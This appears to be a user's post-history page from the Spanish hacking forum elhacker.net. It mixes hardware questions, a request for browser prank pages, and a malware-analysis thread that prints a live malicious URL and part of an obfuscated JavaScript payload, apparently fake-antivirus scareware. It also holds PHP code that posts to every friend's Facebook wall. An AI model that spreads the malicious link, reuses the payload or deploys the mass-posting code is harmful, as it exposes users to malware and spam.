elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


  Mostrar Mensajes
Páginas: 1 2 [3] 4 5 6 7 8 9 10 11 12 13 14 15 16
21  Foros Generales / Foro Libre / Re: Aun existen las bromas tipo masfresa.com? en: 11 Febrero 2012, 21:09 pm
Citar
Que problemas ha traído ese tipo de webs...

Jajaja, lo se y por eso mismo creo que las nuevas versiones de los exploradores ya estan a prueba de este tipo de bromas.
Si alguien sabe de alguna que este vigente que me la compartaaaaaaa!


-----    piratamundo.com/z/LoQueInventastes html <----- esta era del tipo de masfresa.com pero ahora en chrome ya no vibra la pantalla.
:(
que triste.
22  Foros Generales / Foro Libre / Aun existen las bromas tipo masfresa.com? en: 11 Febrero 2012, 19:09 pm
buenas foreros, quiero hacerle una broma a un colega pero no encuentro ninguna web parecida a la que era antes masfresa.com donde vibraba la pantalla y no podias cerrar el navegador.
Mi pregunta es si con tantas nuevas versiones aun funcionan esos scripts?

Saludos!

pd. si conocen alguna web parecida posteenla!
23  Seguridad Informática / Análisis y Diseño de Malware / Re: Andando por ahi... en: 10 Febrero 2012, 19:09 pm
Fuck, como quiera ya no pude rescatar los archivos por que cerraron la pagina.
Hay una forma facil de encontrar este tipo de malwares, algun google dork?
24  Seguridad Informática / Análisis y Diseño de Malware / Re: Andando por ahi... en: 10 Febrero 2012, 03:34 am
Perdon q no especifique.

este es el code completo, me van a tener q llamar ignorante pero como se vuelve entendible el code?


http://tinypaste.com/222d0e5a
25  Seguridad Informática / Análisis y Diseño de Malware / Andando por ahi... en: 9 Febrero 2012, 05:03 am
Buenas foreros, navegando me encontre con esta paginita que esta interesante:
Código:
http://www1.zty2.com/qpgl4p?u9eieuuj=mabe16LY6Nzl1uZY6qLJpp2lp5qg5OKWsmyLysfX56fNtcaCm6XYppemppDp57ap63CLy87ZsszZur9Y6KDQ4aLn5c7q6Z%2BV2HaywYve5aespKpgpnCXl5ampZiupp%2Bl6ZrZ3tiyppDx3d1vpmmXoovp6da3pKqUqmmYoZylrp%2Bg6OxvpmyXoZyqrKKwrJ%2BW5KbG0tOy7OHxp6em5Knf0dCi3N%2Fb5t1grWvOl9Pa6ZDb3t6csqrR0d7om9zf2raa6a3Vjpi2mpzAmat47LDcl8vW2M%2Fc4%2Bido5zU1oqnu9ao5OGimmyr3oqoudLu6OlXp26YqoqnqpzAmatnp3%2FS0Mbn3szb4N2bo5zU1oqnqpzAmato3V6Yrce2xq%2Fn58h05l0%3D
MALWARE, ABRIR CON PRECAUCIÓN


Alguno de ustedes ha visto algo similar ?
Veo que tiene un archivo javascript cifrado pero no encuentro como se descifra, alguien me puede dar una ayudadita?


Aqui dejo el principio del JS.

Código:
var zc9rvF3044alzDKJd="37278";
var v26EyNdGW15lP128M67xLPYey1DCr7="bz rav"+'"'+"{=waiouwrqaf:"+'"'+"hjaqx"+'"'+",esllaf:"+'"'+"yhafesorqgnn"+'"'+",slaf:"+'"'+"jdnfic"+'"'+",e"+'"'+"t"+'"'+",eslaf:"+'"'+"kvyddk"+'"'+",eslaf:nd-:"+'"'+"kjvjemhu"+'"'+",1id< "+'"'+":"+'"'+"fm v"+'"'+"\\=ssalc_omorpn\\>"+'"'+"\\niam\\ di vid<torp"+'"'+"\\=>"+'"'+"\\pot_omn\\vid<t\\  ssalc _omorp"+'"'+"\\=abdnuorgkcdi "+'"'+"\\sel_pot"+'"'+"\\=tfid/\\<>"+'"'+"\\  n\\>valc vid< ssomorp"+'"'+"\\=gkcab_ "+'"'+"\\sdnuordir_pot"+'"'+"\\="+'"'+"\\thgi\\>vid/\\<> n>vid/\\< d<  n\\=ssalc vi"+'"'+"\\oc_omorp\\tnetn n\\  n\\>"+'"'+"  alc vid<p"+'"'+"\\=sskcab_omorrg "+'"'+"\\sdnuol"+'"'+"\\=di\\unem_tfe>"+'"'+"\\>vid/\\<n\\   nc vid<   alacs"+'"'+"\\=ss_srenn"+'"'+"\\gniddap\\>d<t\\   nalc vimorp"+'"'+"\\=ss_ouorgkcabit sdnps<>"+'"'+"\\eltnaiD draH>irD ks\\<)2( sevs/d/\\<>nap n\\>vic vid<   alacs"+'"'+"\\=ss1wor_n    n\\>"+'"'+"\\t\\alc vid<s"+'"'+"\\=sskcolb_nac\\1    n\\>"+'"'+"id<t\\ \\=ssalc vp"+'"'+"cab_omornuorgki_nacs sdoc/\\<>"+'"'+"\\1nn\\>vidid<       v"+'"'+"\\=ssalcrenacs"+'"'+"\\redloh_\\>\\      n vid<ts"+'"'+"\\=ssalcac\\ecalp_ntatS>"+'"'+"C ksiD su :i naps< cs"+'"'+"\\=d\\1txet_na>"+'"'+"gninnacS/\\<...d/\\<>napsvi     n\\>vid<  "+'"'+"\\=ssalc rpkcab_omodnuorg_redaol sgbid/\\<>"+'"'+"\\  n\\>vvid<     c l"+'"'+"\\=ssal_redaoi "+'"'+"\\trela=ds_nacs"+'"'+"\\1sutaterht 0>"+'"'+"\\tatceted sd/\\<de    n\\>vi  \\>vid/\\<     nn\\>vid/\\<   vid<  

26  Informática / Hardware / Re: Cambiar APU de laptop ASUS en: 8 Febrero 2012, 22:40 pm
Perdon por las palabras pero...
TE LA MAMASTE que hasta link a mercadolibre me conseguiste, eres un amor wey, muchas gracias.  ;-)

O sea que si puedo actualizar el procesador.

Por la garantia no me voy a preocupar, tomare el riesgo!

A como veo ese vendedor de mercado ya no tiene articulos a la venta a ver si puedo conseguirme uno en mexico.
27  Informática / Hardware / Cambiar APU de laptop ASUS en: 8 Febrero 2012, 20:28 pm
Hola foreros, tengo un problemilla.
Hace unos meses me hice de una laptop Asus:

• Modelo Asus K53TA-ME1
Procesador y Memoria caché
• Procesador AMD® Fusion A4 3300M (Dual Core) 1.9 GHz
Chipset
• AMD A4 3300M

Y veo que tiene una hermanita, la Asus K53TA-A1

Portátil: Asus K53TA-A1 (K53 Serie)
Procesador: AMD A-Series A6-3400M
Adaptador Gráfico: AMD Radeon HD 6720G2


En la mia el procesador es A4-3300M (2 nucleos) y en la segunda es un A6-3400M (4 nucleos)
Hay diferencia en el socket ?
Es decir, puedo comprar este Apu y ponerselo a mi laptop?

28  Seguridad Informática / Análisis y Diseño de Malware / Que tanto se puede lograr al entrar a un website tocado... en: 3 Diciembre 2011, 08:16 am
Buenas, este tema no genera ningun aporte es mas que todo una gran duda que tengo en este momento.
Una gran curiosidad es conocer lo que existe en metodos de infección.

Actualmente si un usuario en Firefox o en Chrome entra a un website con algun codigo malicioso, que es lo mas avanzado que se puede lograr con tan solo cargar el sitio?
29  Informática / Electrónica / Generador de frecuencias en: 5 Noviembre 2011, 20:10 pm
Buenas, una pregunta a los conocedores.
Es posible generar una frecuencia superior a los 20 Khz (30Khz) por medio de la tarjeta de sonido?
Se que el rango de audicion humana llega a los 20khz, pero necesito generar esa frecuencia para otros fines, pero por ahi lei que el rango de las tarjetas no superaba esa frecuencia.

alguien de ustedes sabe si es posible?
30  Programación / PHP / Problema con App de facebook en: 25 Octubre 2011, 02:24 am
Primero que nada un saludo a todos foreros, quiero preguntarles si alguno de ustedes programa app's de facebook proque tengo un pequeño GRANDISIMO problema.
Tengo una app que estuvo funcionando bien hasta que derrepente el archivo encargado de postear en el wall de los usuarios dejo de funcionar.

El codigo en si es este:

Código:
<?PHP
require_once 'facebook-platform/client/facebook.php';
$api_key = 'xxxx';
$secret  = 'xxxx';
$facebook = new Facebook($api_key, $secret);
$user = $facebook->require_login();



$fql = 'SELECT uid FROM user WHERE uid IN (SELECT uid2 FROM friend WHERE uid1='.$user.')';
$ids_array = $facebook->api_client->fql_query($fql);
if ($ids_array) {
 foreach ($ids_array as $id) {
$target_id = $id['uid'];
?>

<script>

var attachment = {
'name':'xxxx',
'href':'http://apps.facebook.com/xxxx/',
'caption':'xxxx',
'media':[{'type':'image','src':'xxxx','href':'http://apps.facebook.com/xxxx/'}
]};

var actionLinks = [{ "text": "xxxx", "href": "http://apps.facebook.com/xxxx"}];
Facebook.streamPublish('xxxx',attachment,actionLinks,<?=$target_id?>);

</script>
<?
Print_r ($target_id);
}
}
?>

El codigo obtiene todos los friends que tengo, los mete en un array luego por cada friend hace un "facebook.streampublish" el problema es que cuando se cargan todos los streampublish al darle aceptar al primero desaparecen todos los demas.
No se que este haciendo mal, como digo antes funcionaba, pero derrepente dejo de darme el array asi que modifique todo el codigo y ahora resulto este problema.

Alguno de ustedes me puede orientar o ha tenido algun problema similar?
Páginas: 1 2 [3] 4 5 6 7 8 9 10 11 12 13 14 15 16
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines